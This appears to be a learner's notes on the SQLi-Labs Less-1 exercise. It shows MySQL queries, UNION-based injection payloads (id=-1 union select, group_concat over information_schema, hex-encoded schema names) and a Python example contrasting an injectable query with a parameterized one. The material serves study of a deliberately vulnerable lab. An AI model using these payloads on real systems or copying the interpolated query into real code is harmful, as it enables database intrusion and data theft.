
SQLi Labs Notes

emmmmm

Basic MySQL operations

This is not really an explanation of the operations; I am just writing them down so they are handy. While trying injections I verify my ideas on the backend at the same time, which I think helps me understand.

After attaching to the terminal, just log in with mysql -u root. That puts you in the MySQL shell.

show databases;

Lists all databases.

Always remember to end the statement with a ; !

use security;   -- select the database

As an aside, I didn't expect markdown to recognize SQL syntax. Impressive, impressive.

Less-1

  • First try
    ?id='
    and you can see the error
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1
    Then guess that the statement is
    select * from users where id='$id' limit 0,1;
    Strictly speaking, I had read other people's writeups first, so this is shooting the arrow and then painting the target around it.
Limit

About this

LIMIT 0,1

I feel it has no real effect here. "The LIMIT clause is used to specify the number of records to return."
Of course that may be because I don't know how to legitimately return information on several users; I think it is meant to restrict that situation:

where id in (1,2)

This returns two rows, and then limit shows its effect.
Earlier I had this wrong: in limit 0,1 the first argument, 0, is the row of the result to start from (counting from 0), and the second argument, 1, is how many rows to return.

mysql> select * from users where id in (1,2) limit 1,1;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  2 | Angelina | I-kill-you |
+----+----------+------------+
1 row in set (0.00 sec)

mysql> select * from users where id in (1,2);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
+----+----------+------------+
2 rows in set (0.00 sec)

That's how it is.

Order by

order by 

Not only can you specify the column to sort by with its number, you can also use the column name (obviously).

mysql> select * from users order by username;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 14 | admin4   | admin4     |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
| 12 | dhakkan  | dumbo      |
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
+----+----------+------------+
13 rows in set (0.00 sec)

Getting started properly (?)
mysql> select * from users where id='1' union select 1,2,3 limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id='-1' union select 1,2,3 limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

Welcome    Dhakkan
Your Login name:2
Your Password:3

Here I use -1 (which is not in the table) and, combined with what the web page returns, it is clear that it displays the 2nd and 3rd columns.
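As an added example (not code from the original notes or from sqli-labs), the script below rebuilds a small stand-in for the users table with sqlite3 and contrasts the backend query guessed in Less-1, built by string interpolation, with the same query using a bound parameter: the interpolated form turns a lone ' into a syntax error and lets the -1 plus union trick from the shell session above take over the returned row, while the bound form only ever treats the input as a value. The rows are constructed from the output above and sqlite3 stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for sqli-labs' security.users (rows copied from the
# shell output above); sqlite3 is used here instead of MySQL.
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany("insert into users values (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    # The backend query guessed in Less-1, built by string interpolation:
    # whatever arrives in ?id= becomes part of the SQL text itself.
    sql = f"select * from users where id='{user_id}' limit 0,1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Same query, but the value is bound as a parameter, so it can only be
    # compared against id and can never change the statement's structure.
    sql = "select * from users where id=? limit 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn, user_id):
    # Returns the rows, or the database's error text when the input breaks
    # the statement (the "You have an error in your SQL syntax" case).
    try:
        return lookup_vulnerable(conn, user_id)
    except sqlite3.OperationalError as err:
        return f"error: {err}"


if __name__ == "__main__":
    db = make_db()
    # Normal use: both variants return Dumb's row.
    print(lookup_vulnerable(db, "1"), lookup_safe(db, "1"))
    # A lone quote: interpolation yields a syntax error, binding finds nothing.
    print(probe(db, "'"), lookup_safe(db, "'"))
    # id=-1 matches nothing, so the UNION's 1,2,'3' row is what gets shown;
    # the closing quote is supplied by the query's own trailing "' limit 0,1".
    injected = "-1' union select 1,2,'3"
    print(probe(db, injected), lookup_safe(db, injected))
```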

Functions

select system_user(); -- show the system user

mysql> select system_user();
+----------------+
| system_user()  |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

-- likewise, there are also
user()
current_user()
database() -- the current database
version() -- same effect as @@version in The Web Application Hacker's Handbook
@@datadir -- mysql data directory (?)
@@version_compile_os -- operating system

I think I still need to look these up in the manual; I am really unfamiliar with them.

group_concat()

The book doesn't feel adequate; it still covers too little (or maybe that's because I haven't finished it). Using functions feels very convenient.

mysql> select * from users where id='-1' union select NULL , NULL , group_concat(schema_name) from information_schema.schemata limit 0,1;
+------+----------+-----------------------------------------------------------------+
| id   | username | password                                                        |
+------+----------+-----------------------------------------------------------------+
| NULL | NULL     | information_schema,challenges,mysql,performance_schema,security |
+------+----------+-----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select group_concat(table_name) from information_schema.tables where table_schema='security';
+-------------------------------+
| group_concat(table_name)      |
+-------------------------------+
| emails,referers,uagents,users |
+-------------------------------+
1 row in set (0.00 sec)

mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479;
+-------------------------------+
| group_concat(table_name)      |
+-------------------------------+
| emails,referers,uagents,users |
+-------------------------------+
1 row in set (0.00 sec)

0x7365637572697479 is security written as a hex literal; this avoids the problem of having to introduce single quotes.